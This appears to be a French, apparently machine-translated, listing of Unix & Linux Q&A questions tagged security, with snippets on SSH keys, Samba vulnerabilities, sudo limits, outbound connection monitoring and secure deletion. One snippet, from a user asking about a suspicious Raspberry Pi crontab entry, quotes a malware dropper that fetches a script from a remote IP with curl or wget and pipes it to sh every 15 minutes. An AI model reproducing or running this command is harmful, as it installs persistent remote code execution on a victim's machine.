Unix & Linux security

3

L'administrateur du serveur m'a envoyé une clé privée à utiliser. Pourquoi?

Je suis censé accéder à un serveur afin de lier les serveurs intermédiaires et actifs d'une entreprise à notre boucle de déploiement. Un administrateur de leur côté a configuré les deux instances, puis a créé un utilisateur sur le serveur pour nous permettre de SSH en tant que. C'est ce …

73 ssh security key-authentication administration

2

“WannaCry” sur les systèmes Linux: comment vous protégez-vous?

Selon un article de rapid7 , certaines versions de Samba vulnérables permettent l'exécution de code à distance sur les systèmes Linux: Bien que le ver de rançon WannaCry ait affecté les systèmes Windows et soit facilement identifiable, la vulnérabilité de Samba , avec des étapes de résolution claires, aura des …

73 linux security linux-kernel samba

7

Comment puis-je surveiller toutes les demandes / connexions sortantes de ma machine?

Ma machine étant un serveur, je souhaite donc ignorer les connexions établies sur mon serveur (par exemple, lorsqu'une personne visite mon site Web). Je veux voir uniquement les connexions / demandes effectuées par mon serveur vers d'autres endroits. Comment puis-je voir uniquement ces connexions sortantes? EDIT: Je suis nouveau à …

71 command-line networking shell-script security

3

Comment curl empêche-t-il un mot de passe d'apparaître dans la sortie ps?

J'ai remarqué il y a quelque temps que les noms d'utilisateur et les mots de passe donnés en curltant qu'arguments de ligne de commande n'apparaissent pas dans la pssortie (bien qu'ils puissent bien sûr apparaître dans votre historique bash). De même, ils n'apparaissent pas dans /proc/PID/cmdline. (La longueur de l'argument …

68 security password curl ps arguments

18

Accès root qui ne peut pas changer le mot de passe root?

Nous avons un petit problème sur un serveur. Nous voulons que certains utilisateurs soient capables de faire, par exemple, sudoet de devenir root, mais avec la restriction que l'utilisateur ne peut pas changer le mot de passe root. C’est-à-dire une garantie que nous pouvons toujours nous connecter à ce serveur …

66 ubuntu security sudo

4

Y a-t-il un moyen d'empêcher qu'une commande soit ajoutée à votre historique?

Y a-t-il un moyen d'empêcher qu'une commande soit ajoutée à votre historique? J'ai une commande que je veux garder en dehors de mon historique, et je m'en fiche de l'avoir là lorsque je cherche l'historique mémorisé, bien que ce soit moins inquiétant. Est-il possible d'empêcher cela, ou dois-je simplement revenir …

65 bash security zsh command-history

2

Est-il prudent de donner ma clé publique SSH au travail?

Je travaille actuellement à distance pour un certain nombre d'organisations qui ont besoin de moi pour accéder régulièrement à leurs serveurs à des fins de maintenance et de mises à niveau. Est-il sécuritaire pour moi d'ajouter ma clé publique SSH RSA au .ssh/authorized_keysfichier pour me permettre de me connecter beaucoup …

60 ssh security key-authentication

4

Déplacement de / var, / home vers une partition séparée

J'essaie de déplacer certains dossiers (tels que /varet /home) vers une partition séparée après avoir lu ce guide: 3.2.1 Choisir un schéma de partition intelligent J'ai pu déplacer un dossier avec succès en suivant ce guide. Cependant, cela ne semble pas fonctionner pour plusieurs dossiers et tous mes dossiers sont …

59 debian security partition fstab

2

Entrée crontab suspecte exécutant 'xribfa4' toutes les 15 minutes

Je voulais ajouter quelque chose à mon fichier crontab racine sur mon Raspberry Pi, et j'ai trouvé une entrée qui me paraissait suspecte. Entrée Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Le contenu de http://103.219.112.66:8000/i.shsont: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo …

59 security cron malware

2

Que signifie l'option Chromium `--no-sandbox`?

Je lance Chromium comme ceci: chromium --no-sandbox Je le fais parce que j'exécute Debian Squeeze sur un conteneur VM OpenVZ et que c'est le seul moyen de le faire fonctionner. Bien que je continue à lire, c'est terrible . Mais je veux savoir pourquoi exactement. Quelqu'un peut-il me l'expliquer? Quelqu'un …

54 security chrome browser sandbox

1

Pourquoi les premiers 1024 ports sont-ils limités à l'utilisateur root?

C'est plus une curiosité oisive qu'autre chose. Un de mes amis m’a demandé: «quelle plage de ports est-ce que seul root peut utiliser sous Linux? Je lui ai dit que 0-1024 étaient limités. Puis il m'a demandé pourquoi il en était ainsi et ... j'étais perdue. Aucune idée du tout. …

53 networking security root tcp

5

Mutt: comment stocker en toute sécurité mot de passe?

Mon fichier .muttrc ressemble à ceci ou à un aperçu ci-dessous. Je suis hésitant avec le mot de passe. Comment dois-je stocker mon mot de passe pour l'utiliser mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set …

52 security mutt

3

Convertir une clé Amazon .pem en clé Putty .ppk Linux

J'ai généré et téléchargé une .pemclé privée à partir d'AWS. Cependant, pour utiliser Putty afin de se connecter à la machine virtuelle, je dois avoir cette clé au .ppkformat. Le processus de conversion est détaillé en 20 lignes environ ici: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty J'utilise Linux Mint (une distribution Ubuntu) et je sais …

49 ssh linux-mint security putty amazon-ec2

7

Comment déchiqueter récursivement une arborescence de répertoires?

J'ai une arborescence de répertoires que je voudrais déchiqueter avec l'utilitaire 'shred' de Linux. Malheureusement, shred n'a pas d' -Roption pour le déchiquetage récursif. Comment déchiqueter une arborescence de répertoires entière de manière récursive?

48 security rm data-destruction

2

Comment identifier un processus qui n'a pas de pid?

J'ai un processus qui écoute 2 ports: 45136 / TCP et 37208 / UDP (en fait, je suppose que c'est le même processus). Mais netstat ne renvoie aucun pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Même résultat avec "grep 37208". J'ai aussi essayé lsof: …

47 networking security process

Questions marquées «security»